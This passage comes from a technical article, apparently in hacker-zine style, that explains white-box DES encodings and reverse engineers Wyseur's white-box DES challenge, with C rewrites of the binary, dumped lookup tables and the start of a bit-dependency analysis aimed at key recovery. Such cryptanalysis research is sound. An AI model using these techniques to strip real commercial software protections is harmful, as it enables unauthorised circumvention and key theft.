+       the 32 bits of R(r). As a result, constructing 'Mem2' can be done
+       extracting 16 bits out of R(r) and the 16 remaining ones out of
+       'Mem3'. With this property, the internal state is composed of 96
+       bits. Here is a diagram ripped from [R17] to understand how the
+       primitive is modified to handle this 96 bits state:
+
+
+                    32b               48b              16b
+               ************** ********************* ********
+    state 1:   *     L(r)   * *       X(r)        * * r(r) *
+               ************** ********************* ********
+                     |                |      |         |
+                     |                v      |         |
+                     | *********    .....    |         v
+                     | * sK(r) *--> . + .    |    .-------.
+                     | *********    .....    '-->(  Merge  )
+                     |                |           '-------'
+                     |                v               |
+                     |         .-------------.        |
+                     |          \     S     /         |
+                     |           '---------'          |
+                     |                |               |
+                32b  v                v 32b     32b   v
+               ************** *************** ***************
+    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
+               ************** *************** ***************
+                     |                  |           |
+                     v                  |           |
+                   .....    .--------.  |           |
+                   . + .<---|    P   |<-'           |
+                   .....    '--------'              |
+                    |                               |
+                32b '----------------------------------.
+                                        |           |  |
+                    .-------------------|-----------'  |
+                    |               32b v              v 32b
+                    |               .-------.       .------.
+                    |              /  E-box  \     ( Select )
+                    |  32b        '-----------'     '------'
+                    |                   |              |
+                    v               48b v              v 16b
+               ************** ********************* ********
+    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
+               ************** ********************* ********
+
+       With:
+           - sK(r) being the subkey of round r
+           - X(r) being the output of the E-box of round r-1
+           - Y(r) being the output of the SBox of round r-1
+           - r(r) being the complementary bits so that X(r) and r(r) is a
+             duplication of R(r)
+
+    b) Input and outputs between elementary operations are protected using
+       what is called the "internal encodings". These encodings are applied
+       to functions implemented as lookup tables.
+
+       Let's take an example. You are chaining f() and g() which means that
+       you are calculating the composition g() o f(). Obviously without any
+       protection, an attacker can intercept the result of f() at debug
+       time (e.g. by putting a breakpoint at the entry of g())
+
+       Now if you want to protect it, you can generate a random bijection
+       h() and replace f() and g() by F() and G() where:
+
+           F() = h() o f()
+           G() = g() o h()^-1
+
+       Note: Again this is a mere example, we do not care about the
+       {co}domain consideration.
+
+       These functions are evaluated and then expressed as lookup tables.
+       Obviously this will not change the output as:
+
+           G() o F() = (g() o h()^-1) o (h() o f())
+                     = g() o (h()^-1 o h()) o f()    [associativity]
+                     = g() o f()
+
+       But the difference is that intercepting the output of F() doesn't
+       give the output of f(). Pretty cool trick, right?
+
+       However I've just written that WB DES implementations were always
+       manipulating 96 bits states. Then does it mean that we need lookup
+       tables of 2^96 entries? No, this would be troublesome ;> We can use
+       the so called "path splitting" technique.
+
+       Consider the example of a 32 bits buffer. To avoid using a huge
+       lookup table, you can consider that this buffer is an 8 bits array.
+       Each element of the array will then be obfuscated using a
+       corresponding 8 bits lookup table as described below:
+
+                *****************************************
+                *   IN[0] ||  IN[1] ||  IN[2] ||  IN[3] *
+                *****************************************
+                      |         |         |         |
+                      |         |         |         |
+                      v         v         v         v
+                  .-------. .-------. .-------. .-------.
+                  | 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B |
+                  '-------' '-------' '-------' '-------'
+                      |         |         |         |
+                      |         |         |         |
+                      v         v         v         v
+                *****************************************
+                *  OUT[0] || OUT[1] || OUT[2] || OUT[3] *
+                *****************************************
+
+       I took the example of an 8 bits array but I could have used any
+       size. Something really important to understand: the smaller the
+       lookup table is, the more it will leak us information. Keep it in
+       mind.
+
+    c) Do you remember when I said that a WB implementation was the exact
+       implementation of the corresponding crypto primitive? Well it's not
+       true. Or you could say that I was simplifying things ^_~
+
+       Most of the time (in real life), WB_DES() is a G() o DES() o F()
+       where F() and G() are encoding functions. So the first input
+       (plaintext) and the last output (ciphertext) may be obfuscated as
+       well. This is called an "external encoding" and this is used to
+       harden the white-box implementation. Indeed if there were no such
+       functions, first & last rounds would be weaker than other rounds.
+       This 'academic' protection aims at preventing trivial key recovery
+       attacks. A WB implementation without external encoding is said to be
+       'naked'.
+
+       In the context of real life protections, it may (or may not) be
+       associated with an additional layer to protect the I/O before &
+       after the encryption. It would be bad to intercept the plaintext
+       once decrypted, right? Commercial protections almost never use
+       native implementations for (at least) this reason. Intercepting a
+       plaintext is indeed far easier than recovering the encryption key.
+
+       In the WB DES case, common academic designs use affine functions,
+       encoded or not.
+
+
+                         Transforming DES functions
+                         --------------------------
+
+
+    Now that we've had an overview of how I/O were protected between
+elementary functions, let's see how we can build said functions.
+
+    a) The partial evaluation
+
+    This is probably the most intuitive part of the WB implementation. This
+is about 'fusing' the S-Boxes with the round-keys. This is exactly what was
+performed in the previous AES challenge. If you can remember, this is also
+the first example that I gave at the beginning of the paper to introduce
+the white-boxing concept.
+
+    Using the previous diagram, it means that we want to convert this step:
+
+                    32b               48b              16b
+               ************** ********************* ********
+               *     L(r)   * *       X(r)        * * r(r) *
+               ************** ********************* ********
+                      |               |      |         |
+                      |               v      |         |
+                      |   ******    .....    |         v
+                      |   * sK *--> . + .    |    .-------.
+                      |   ******    .....    '-->(  Merge  )
+                      |               |           '-------'
+                      |               v               |
+                      |        .-------------.        |
+                      |         \     S     /         |
+                      |          '---------'          |
+                      |               |               |
+                32b   v               v 32b     32b   v
+               ************** *************** **************
+               *    L(r)    * *    Y(r+1)   * *    R(r)    *
+               ************** *************** **************
+
+    into this one:
+
+
+               *********************************************
+               *          state 1 (12 x 8 = 96 bits)       *
+               *********************************************
+                  |      |      |                       |
+                  v      v      v                       v
+               .-----..-----..-----.                 .-----.
+               | T0  || T1  || T2  |       ...       | T11 |
+               '-----''-----''-----'                 '-----'
+                  |      |      |                       |
+                  v      v      v                       v
+               *********************************************
+               *              state 2 (96 bits)            *
+               *********************************************
+
+
+    A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There
+    are two types of T-Box because of the heterogeneity of the operations
+    performed on the state:
+
+       - The non neutral T-box. They are the 8 T-boxes involved with the
+         Sbox and the XOR. Each of them is concealing an Sbox and a subkey
+         mixing.
+
+             input:
+                      -> 6 bits from X(r) to be mixed with the subkey
+                      -> 1 bit from L(r) or r(r)
+                      -> 1 bit from L(r) or r(r)
+             output:
+                      -> 4 bits from the Sbox
+                      -> 2 bits from X(r) taken from the input before being
+                         mixed with the subkey
+                      -> 1 bit from L(r) or r(r)
+                      -> 1 bit from L(r) or r(r)
+
+       - The neutral T-box which are only used to connect bits of state 1
+         to bits of state 2. For example the bits of L(r) are never
+         involved in any operation between state 1 and state 2.
+
+             input:
+                      -> 1 bit from L(r) or r(r)
+                      -> 1 bit from L(r) or r(r)
+                        [...]
+                      -> 1 bit from L(r) or r(r)
+             output:
+                      -> the input (permuted)
+
+    Keep in mind that in each case, you have a 'nibble view' of both inputs
+    and outputs. Moreover, permutations are used to make harder the
+    localization of Sbox upon a simple observation. To have a better
+    understanding of this point as well as associated security explanations
+    I recommend to read [R09].
+
+    b) The AT transformation
+
+    We now want to transform this:
+
+
+               ************** *************** ***************
+    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
+               ************** *************** ***************
+                     |                  |           |
+                     v                  |           |
+                   .....    .--------.  |           |
+                   . + .<---|    P   |<-'           |
+                   .....    '--------'              |
+                    |                               |
+                32b '----------------------------------.
+                                        |           |  |
+                    .-------------------|-----------'  |
+                    |               32b v              v 32b
+                    |               .-------.       .------.
+                    |              /  E-box  \     ( Select )
+                    |  32b        '-----------'     '------'
+                    |                   |              |
+                    v               48b v              v 16b
+               ************** ********************* ********
+    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
+               ************** ********************* ********
+
+    into this:
+
+               *********************************************
+               *              state 2 (96 bits)            *
+               *********************************************
+                  |      |      |                       |
+                  v      v      v          ...          v
+
+               ?????????????????????????????????????????????
+
+                  |      |      |          ...          |
+                  v      v      v                       v
+               *********************************************
+               *              state 3 (96 bits)            *
+               *********************************************
+
+
+    To put it simply, and as said earlier, the combination of the P-Box and
+the following XOR is an affine function. Because we want to use lookup
+tables to implement it we will have to use a matrix decomposition.
+
+    Let's take an example. You want to protect a 8x8 bit-matrix
+multiplication. This matrix (M) can be divided into 16 2x2 submatrix as
+shown below:
+
+           .----.     .----.----.----.----.     .----.
+           | Y0 |     | A  | B  | C  | D  |     | X0 |
+           .----.     .----.----.----.----.     '----'
+           | Y1 |     | E  | F  | G  | H  |     | X1 |
+           .----.  =  .----.----.----.----.  x  .----.
+           | Y2 |     | I  | J  | K  | L  |     | X2 |
+           .----.     .----.----.----.----.     .----.
+           | Y3 |     | M  | N  | O  | P  |     | X3 |
+           '----'     '----'----'----'----'     '----'
+
+          Vector Y          Matrix M           Vector X
+
+    Here the Yi and Xi are 2 bits sub-vectors while A,B,C,etc. are 2x2
+bit-submatrix. Let's focus on Y0, you can write:
+
+    Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3
+
+    Because A,B,C and D are constants it's possible to evaluate the
+multiplications and build the corresponding lookup tables (Li). This gives
+the following diagram:
+
+            ******    ******    ******    ******
+            * X0 *    * X1 *    * X2 *    * X3 *
+            ******    ******    ******    ******
+              |          |         |         |
+              v          v         v         v
+            .----.    .----.    .----.    .----.
+            | L0 |    | L1 |    | L3 |    | L4 |
+            '----'    '----'    '----'    '----'
+               |         |         |         |
+               |  .....  |         |  .....  |
+               '->. + .<-'         '->. + .<-'
+                  .....               .....
+                    |                   |
+                    |       .....       |
+                    '------>. + .<------'
+                            .....
+                              |
+                              v
+                            ******
+                            * Y0 *
+                            ******
+
+    You may object (and you would be right) that information is still
+leaking and that it would be easy to retrieve the original matrix. Well
+it's true. Thus to avoid this kind of situation two techniques are used:
+
+    - Each XOR operation is hidden inside a lookup table. In our example,
+
+      the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4
+      outputs (hence a size of 4x16 = 64 bits).
+
+    - Internal encoding (remember the previous explanations) is used to
+      protect the I/O between the lookup tables.
+
+    Our matrix multiplication becomes:
+
+     ******  ******    ******  ******
+     * X0 *  * X1 *    * X2 *  * X3 *
+     ******  ******    ******  ******
+
+        |      |          |       |
+        v      v          v       v
+
+        2b    2b          2b     2b
+      <----><---->      <----><---->
+      .----------.      .----------.
+       \   S0   /        \   S1   /
+        '------'          '------'
+         <---->            <---->
+           2b                2b
+
+                \         /
+                 \       /
+                  |     |
+                  v     v
+
+                  2b    2b
+                <----><---->
+                 .---------.
+                 \   S2   /
+                  '------'
+                   <---->
+                     2b
+
+                      |
+                      v
+
+                   ******
+                   * Y0 *
+                   ******
+
+    This is called an 'encoded network'. The main side effect of this
+construction is the important number of lookup tables required.
+
+
+--[ 6 - Breaking the second case: Wyseur's challenge
+
+
+----[ 6.1 - Reverse engineering of the binary
+
+
+    As far as I can tell, there is an obvious need to rewrite the binary as
+C code because:
+
+        - We need to understand exactly what's going on from a mathematical
+          point of view and C is more suitable than ASM for that purpose
+
+        - Rewriting the functions will allow us to manipulate them easily
+          with our tools. This is not mandatory though because we could
+          be using debugging functions on the original binary itself.
+
+    Again I won't detail all the reverse engineering process because this
+is neither the main topic nor very hard anyway compared to what you may
+find in the wild (in commercial protections).
+
+
+                           High level overview
+                           --------------------
+
+
+    Let's begin by running the executable:
+
+---------------------------------------------------------------------------
+$ ./wbDES.orig
+Usage: ./wbDES.orig <INPUT>
+Where <INPUT> is an 8-byte hexadecimal representation of the input to be
+encrypted
+Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3
+---------------------------------------------------------------------------
+
+    OK so we need to provide the 8 bytes of the plaintext as separate
+arguments in the command line. Hum, weird but OK. When the binary is
+executed, the first thing performed is a conversion of the arguments
+because obviously a suitable buffer for cryptographic operations is
+necessary. The corresponding instructions were rewritten as the following
+C function:
+
+---------------------------------------------------------------------------
+// I even emulated a bug, will you find it? ;>
+inline void convert_args(char **argv)
+{
+    int i = 0;                  // ebp-50h
+
+    while(i <= 7)
+    {
+        char c;
+        c = argv[1+i][0];
+
+        if(c <= '9')
+        {
+            c -= '0';          // 0x30 = integer offset in ASCII table
+            in[i] = (c<<4);
+        }
+        else
+        {
+            c -= ('a' - 10);
+            in[i] = (c<<4);
+        }
+
+        c = argv[1+i][1];
+
+        if(c <= '9')
+        {
+            c -= '0';        // 0x30 = integer offset in ASCII table
+            in[i] ^= c;
+        }
+        else
+        {
+            c -= ('a' - 10);
+            in[i] ^= c;
+        }
+        i++;
+    }
+    return;
+}
+---------------------------------------------------------------------------
+
+    Once the job is done, an 8 bytes buffer (in[8], the plaintext) is
+built. This is where serious business begins. Thanks to the Control Flow
+Graph provided by your favorite disassembler, you will quickly identify 3
+pseudo functions* :
+
+    - wb_init(): 0x0804863F to 0x08048C1D
+
+      This code takes an 8 bytes buffer, returns 1 byte and is called 12
+      times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built.
+      As said earlier, the WB is operating on 96 bits states so this is
+      most likely the initialization function.
+
+    - wb_round(): 0x08048C65 to 0x08049731
+
+      This code takes the 12 bytes buffer generated by wb_init() as input
+      and modifies it. The function is called 16 times by main(). Because
+      16 is exactly the number of DES rounds, assuming it is the round
+      function seems fair.
+
+    - wb_final(): 0x08049765 to 0x08049E67
+
+      This code takes the last buffer returned by wb_round() as input and
+      returns an 8 bytes buffer which is printed on the screen. So we can
+      assume that this is the termination function in charge of building
+      the DES ciphertext out of the last internal state.
+
+*: There is no 'function' in this program, probably because of an inlining,
+but we can still distinguish logical parts.
+
+    You may argue that attributing roles to wb_init, wb_round and wb_final
+is a bit hasty but there is something interesting in the code: symbols! In
+each of these functions, an array of lookup tables is used and named
+'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the
+corresponding functions. Convenient isn't it?
+
+    Usually in commercial protections, engineers will take care of little
+details such as this and try to avoid leaking any information. In this case
+however, it can be assumed that the focus is on the cryptography as there
+are neither anti-debugs nor anti-disassembling protections so it should be
+safe to trust our intuition.
+
+    Thanks to this first reverse engineering step, we're able to rewrite
+a similar main function:
+
+-------------------------------- wb_main.c --------------------------------
+unsigned char in[8];            // ebp-1Ch
+unsigned char out[12];          // ebp-28h
+unsigned char temp[12];         // ebp-34h
+
+[...]
+
+int main(int argc, char **argv)
+{
+    if( argc != 9)
+    {
+        printf(usage, argv[0], argv[0]);
+        return 0;
+    }
+
+    /* Fill the in buffer */
+
+    convert_args(argv);
+
+    /* and print it :) */
+
+    printf("\nINPUT:    ");
+    for(j=0; j<8; j++)
+        printf("%02x ", in[j]);
+
+    /* WB initialisation */
+
+    for(j=0; j<12; j++)
+        wb_init(j);
+
+    round_nbr = 0;
+    for(round_nbr=0; round_nbr<15; round_nbr++)
+    {
+        memcpy(temp, out, 12);
+        wb_round();
+    }
+
+    /* Building the final buffer */
+
+    printf("\nOUTPUT:   ");
+    for(j=0; j<8; j++)
+        wb_final(j);
+
+    printf("\n");
+    return 0;
+}
+-------------------------------- wb_main.c --------------------------------
+
+    One hint to speed up things: always focus first on the size and nature
+of buffers transmitted to the different sub-functions.
+
+
+                            Reversing wb_init()
+                            -------------------
+
+
+    It is now time to have a look at the first function. Again I won't
+detail the whole reverse engineering but rather give you a few
+explanations:
+
+    - Whenever the function is called, it uses a set of 15 lookup tables
+      whose addresses are dependent of both the index in the output array
+      and the index of the box itself (amongst the 15 used by the
+      function).
+
+      This means that the sets of tables used to calculate OUT[x] and
+      OUT[y] when x!=y are (likely to be) different and for a same OUT[x],
+      different tables will be applied to IN[a] and IN[b] if a!=b.
+
+    - All of these lookup tables are located at:
+
+          Initialize + 256*idx_box + OUT_idx*0xF00
+          where:
+              > idx_box is the index of the box amongst the 15
+              > OUT_idx is the index in the output array (OUT)
+
+    - The tables are static. Thanks to this property we can dump them
+      whenever we want. I chose to write a little GDB script (available in
+      appendix) to perform this task. The export is an array of lookup
+      tables (iBOX_i) written in C language.
+
+    - wb_init() is performing operations on nibbles (4 bits) so for a
+      particular output byte (OUT[m]), the generation of the 4 least
+      significant bits is independent of the generation of the 4 most
+      significant ones.
+
+    Now with this information in mind, let's have a look at the reversed
+wb_init() function:
+
+-------------------------------- wb_init.c --------------------------------
+unsigned char p[8];
+
+inline void wb_init(
+    int m       // ebp-48h
+)
+{
+    unsigned int temp0; // ebp-228h
+    unsigned int temp1; // ebp-224h
+    [...]
+    unsigned int temp23; // ebp-1CCh
+
+    unsigned int eax,ebx,ecx,edx,edi,esi;
+
+    bzero(p,sizeof p);
+    p[0] = iBOX_0[m][in[0]];
+    p[1] = iBOX_1[m][in[1]];
+    p[2] = iBOX_2[m][in[2]];
+    p[3] = iBOX_3[m][in[3]];
+    p[4] = iBOX_4[m][in[4]];
+    p[5] = iBOX_5[m][in[5]];
+    p[6] = iBOX_6[m][in[6]];
+    p[7] = iBOX_7[m][in[7]];
+
+    // First nibble
+
+    ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 );
+    temp3 = 0xF0 & iBOX_8[m][ecx];
+
+    ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 );
+    eax = iBOX_9[m][ecx] >> 4;
+    ecx = temp3 ^ eax;
+    temp6 = 0xF0 & iBOX_12[m][ecx];
+
+    ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 );
+    eax = iBOX_10[m][ecx] >> 4;
+    ecx = temp6 ^ eax;
+    edi = 0xF0 & iBOX_13[m][ecx];
+
+    ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 );
+    eax = iBOX_11[m][ecx] >> 4;
+    ecx = edi ^ eax;
+    edx = iBOX_14[m][ecx];
+    esi = edx & 0xFFFFFFF0;
+
+    // Second nibble
+
+    ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 ));
+    temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4);
+
+    ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 ));
+    eax = 0x0F & ( iBOX_9[m][ecx] );
+    ecx = temp15 ^ eax;
+    temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 );
+
+    ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 ));
+    eax = 0x0F & iBOX_10[m][ecx];
+    ecx = temp18 ^ eax;
+    temp21 = 0xF0 & (iBOX_13[m][ecx] << 4);
+
+    ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 ));
+    eax = 0x0F & ( iBOX_11[m][ecx] );
+    ecx = temp21 ^ eax;
+    eax = 0x0F & ( iBOX_14[m][ecx] );
+
+    // Output is the combination of both nibbles
+
+    eax = eax ^ esi;
+    out[m] = (char)eax;
+    return;
+}
+-------------------------------- wb_init.c --------------------------------
+
+    In a nutshell:
+        - & (AND) and >>/<< (SHIFTS) are used to operate on nibbles
+        - ^ (XOR) are used to concatenate nibbles in order to build the
+          entries (which are bytes) of the iBOX_i lookup tables
+        - The output byte out[m] is the concatenation of two independently
+          calculated nibbles
+
+    To understand exactly what's going on, a drawing is much clearer. So
+thanks to asciio [R11] this gives us something like this:
+
+
+ ******** ********  ******** ********  ******** ********  ******** ********
+ * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
+ ******** ********  ******** ********  ******** ********  ******** ********
+
+    |        |          |       |          |       |          |        |
+  H |      H |        H |     H |        H |     H |        H |      H |
+    v        v          v       v          v       v          v        v
+
+ <----------------------------- 8x8 = 64 bits --------------------------->
+
+.-------..-------. .-------..-------. .-------..-------. .-------..-------.
+\iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 /
+ '-----'  '-----'   '-----'  '-----'   '-----'  '-----'   '-----'  '-----'
+
+  <----------------------------- 8x4 = 32 bits ------------------------->
+
+    \        /         \        /         \        /          \       /
+   H \      / H       H \      / H       H \      / H        H \     / H
+      v    v             v    v             v    v              v   v
+   .---------.         .---------.        .---------.        .---------.
+   \ iBox_8  /         \ iBox_9  /        \ iBox_10 /        \ iBox_11 /
+    '-------'           '-------'          '-------'          '-------'
+
+     <------------------------- 4x4 = 16 bits ---------------------->
+
+          \              /                       \             /
+        H  \            /  H                   H  \           /  H
+            \          /                           \         /
+             v        v                             v       v
+             .---------.                           .---------.
+             \ iBox_12 /                           \ iBox_13 /
+              '-------'                             '-------'
+
+                <--------------- 2x4 = 8 bits ----------->
+
+                     \                               /
+                      \    H                  H     /
+                       '---------.       .---------'
+                                 |       |
+                                 v       v
+                                .---------.
+                                \ iBox_14 /
+                                 '-------'
+
+                               <- 1x4 bits ->
+
+                                     \
+                                    H \           8 bits
+                                       \       <--------->
+                   Concatenation        '--->  ***********
+                    of nibbles                 *  OUT_x  *
+                                        .--->  ***********
+                                       /
+                                    L /
+                                     /
+
+                               <- 1x4 bits ->
+
+                                 .-------.
+                                / iBox_14 \
+                                '---------'
+                                ^        ^
+                          L     |        |    L
+                       .--------'        '--------.
+                      /                            \
+                     /                              \
+
+                <--------------- 2x4 = 8 bits ----------->
+
+              .-------.                             .-------.
+             / iBox_12 \                           / iBox_13 \
+             '---------'                           '---------'
+
+             ^        ^                             ^       ^
+            /          \                           /         \
+        L  /            \  L                   L  /           \ L
+          /              \                       /             \
+
+     <------------------------- 4x4 = 16 bits ---------------------->
+
+    .-------.           .-------.          .-------.          .-------.
+   / iBox_8  \         / iBox_9  \        / iBox_10 \        / iBox_11 \
+   '---------'         '---------'        '---------'        '---------'
+
+      ^    ^             ^    ^             ^    ^              ^   ^
+   L /      \ L       L /      \ L       L /      \ L        L /     \ L
+    /        \         /        \         /        \          /       \
+
+  <----------------------------- 8x4 = 32 bits ------------------------->
+
+ .-----.  .-----.   .-----.  .-----.   .-----.  .-----.   .-----.  .-----.
+/iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \
+'-------''-------' '-------''-------' '-------''-------' '-------''-------'
+
+<----------------------------- 8x8 = 64 bits --------------------------->
+
+    ^        ^          ^       ^          ^       ^          ^        ^
+  L |      L |        L |     L |        L |     L |        L |      L |
+    |        |          |       |          |       |          |        |
+
+ ******** ********  ******** ********  ******** ********  ******** ********
+ * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
+ ******** ********  ******** ********  ******** ********  ******** ********
+
+    In this case, 'H' is used as a suffix to identify the most significant
+(High) nibble of a particular byte. As you can see, the input (respectively
+the output) is not an 8 (respectively 12) _bytes_ array but rather a 16
+(respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores
+exactly 2 lookup tables. We say that such lookup tables are 'compacted',
+see [R14] for additional details.
+
+
+                            Global description
+                            -------------------
+
+
+    Good news guys, the wb_init(), wb_round() and wb_final() functions are
+composed of the same nibble oriented patterns. So basically wb_round() and
+wb_final() contain also AT applied to a nibbles array and the end of the
+reverse engineering is quite straightforward.
+
+Remark: Manipulating nibbles implies that the internal encoding is
+performed using 4 bits to 4 bits bijections.
+
+    Again thanks to asciio, we're able to draw something like that:
+
+
+                   8 x (2x4) = 64 bits
+          <---------------------------------->
+
+           2x4 = 8 bits
+             <---->
+
+          .----------------------------------.             .-----------.
+          | .-----. .-----.          .-----. |             |   INPUT   |
+       .----| IN0 | | IN1 |   ...    | IN7 | |             '-----------'
+       |  | '-----' '-----'          '-----' |                    |
+       v  '------------|----------------|----'                    v
+       |               v                |                  .------------.
+       |--------<---------------<-------'                 ( wb_init func )
+       |                                                   '------------'
+ .-----v---------------------------------------------.            |
+ |.--------. .--------.                   .---------.|            |
+ || STG0_0 | | STG0_1 |       ...         | STG0_11 ||            |
+ |'--------' '--------'                   '---------'|            |
+ '-----|---------|-----------------------------|-----'            |
+       |         |                             |                  v
+       |         v                             |           .-------------.
+       |         |                             |          ( wb_round func )
+       '--->-----|-------<---------------------'           '-------------'
+                 |                                                |
+ .---------------|------------------------------------.           |
+ |.--------. .---v----.                    .---------.|           |
+ || STG1_0 | | STG1_1 |       ...          | STG1_11 ||           |
+ |'--------' '--------'                    '---------'|           |
+ '----------------------------------------------------'           |
+                                                                  |
+    2x4bits                                                       |
+  <-------->      12 x (2x4) = 96 bits                            |
+ <---------------------------------------------------->           |
+                                                                  v
+                                                           .-------------.
+                              ...                     15x ( wb_round func )
+                                                           '-------------'
+ .----------------------------------------------------.           |
+ |.---------..---------.                  .----------.|           |
+ || STG14_0 || STG14_1 |      ...         | STG14_11 ||           |
+ |'---------''---------'                  '----------'|           |
+ '-----|--------|-------------------------------|-----'           v
+       |        v                               |          .-------------.
+       |        |                               |         ( wb_final func )
+       '----->-----<----------------------------'          '-------------'
+                |                                                 |
+          .-----|----------------------------.                    v
+          |.----v-. .------.         .------.|              .----------.
+          || OUT0 | | OUT1 |   ...   | OUT7 ||              |  OUTPUT  |
+          |'------' '------'         '------'|              '----------'
+          '----------------------------------'
+
+           2x4bits
+           <------>
+                      8 x (2x4) = 64 bits
+          <---------------------------------->
+
+
+    Writing the C code corresponding to these functions is not difficult
+though a bit boring (not to mention prone to mistakes). I was able to
+rewrite the whole binary in a few hours (and it took me almost the same
+time to make it work :O). The source code is available in the appendix.
+
+Remark: I've not tried to use Hex-Rays on the binary but it could be
+interesting to know if the decompilation is working out of the box.
+
+    It's easy to see that my source code is functionally equivalent on the
+input/output behavior:
+
+---------------------------------------------------------------------------
+$ ./wbDES.orig 11 22 ff dd 00 11 26 93           <- the original
+
+INPUT:    11 22 ff dd 00 11 26 93
+OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
+$ make
+$ ./wbdes.try 11 22 ff dd 00 11 26 93            <- my copy :)
+
+INPUT:    11 22 ff dd 00 11 26 93
+OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
+$
+---------------------------------------------------------------------------
+
+    Now let's try to break the white-box. We will proceed in two steps
+which is exactly how I handled the challenge. What is described is how I
+proceeded as I wasn't following academic publications. I don't know if it's
+a better approach or not. It's just my way of doing things and because I'm
+not a cryptographer, it's _practical_. If you prefer more _theoretical_
+solutions, please refer to [R04] for a list of papers dealing with the
+subject.
+
+
+----[ 6.2 - The discovery step
+
+
+    First of all, let's gather some information about this white-box. There
+is a first immediate observation: there is no explicit T-box step which
+proves that it is combined with the AT step in a same function. This is an
+optimization which was historically proposed in [R14] in order to protect
+the output of the T-box and, as a result, to mitigate the so-called
+statistical bucketing attack described in [R09] while compressing the
+implementation by merging operations.
+
+    I used this information as well as the size of the binary (which is a
+bit more than the size of the lookup tables) as indicators of how recent
+the design could be. I didn't have the time to read all the white-box
+related papers (although there are not a thousand of them).
+
+
+                          Analyzing the wb_init()
+                          -----------------------
+
+
+    Earlier, I've made assumptions about wb_init() and wb_round() but at
+this point little is really known about them. Now is the time to play a bit
+with wb_init() and by playing I mean discovering the "link" between the
+input (plaintext) and the input of wb_round() which will be called "stage0"
+from now on.
+
+    Let's begin by a quick observation. As said before, for each output
+byte of wb_init(), there is a corresponding set of 14 (condensed) iBox_i.
+A simple glance at these boxes is enough to determine that for each set,
+the 8 first iBox_i have a very low entropy. Conversely, the remaining 5
+ones have a high entropy:
+
+---------------------------------------------------------------------------
+[...]
+
+unsigned char iBOX_3[12][256] = {
+{
+ 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
+ 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
+ 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
+ 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
+ 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
+ [...]
+ 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
+ 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
+},
+
+[...]
+
+unsigned char iBOX_8[12][256] = {
+{
+ 0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad,
+ 0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1,
+ 0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3,
+ [...]
+ 0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76,
+ 0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02,
+},
+
+[...]
+---------------------------------------------------------------------------
+
+    The example shows us that iBOX_3[0] has only 2 possibles values: 0xf7
+for any index inferior or equal to 127 and 0xf1 for the remaining ones.
+Said otherwise, this box is a bit filter:
+
+        - High output nibble: only 1 possible value (0xf) => no bit chosen
+        - Low output nibble: 2 possible values (0x1, 0x7) => the input's
+                             MSB is chosen
+
+    Let's visualize the effect of the 8 first iBox_i for every output
+nibble. To see if the particular bit at position 'i' is involved in the LUT
+'p' then you can compute:
+
+        - p[0]&0xf0 and p[(1<<i)]&0xf0    ; influence on the High nibble
+        - p[0]&0x0f and p[(1<<i)]&0x0f    ; influence on the Low nibble
+
+    In each case, if the bit at the position 'i' is indeed involved then
+both results will be different. I implemented it in entropy.c
+(see appendix):
+
+---------------------------------------------------------------------------
+$ ./entropy
+
+[+] Link between IN and OUT arrays
+  OUT[0] (high) is composed of:
+    -> bit 6
+    -> bit 49
+    -> bit 57
+    -> bit 56
+  OUT[0] (low) is composed of:
+    -> bit 24
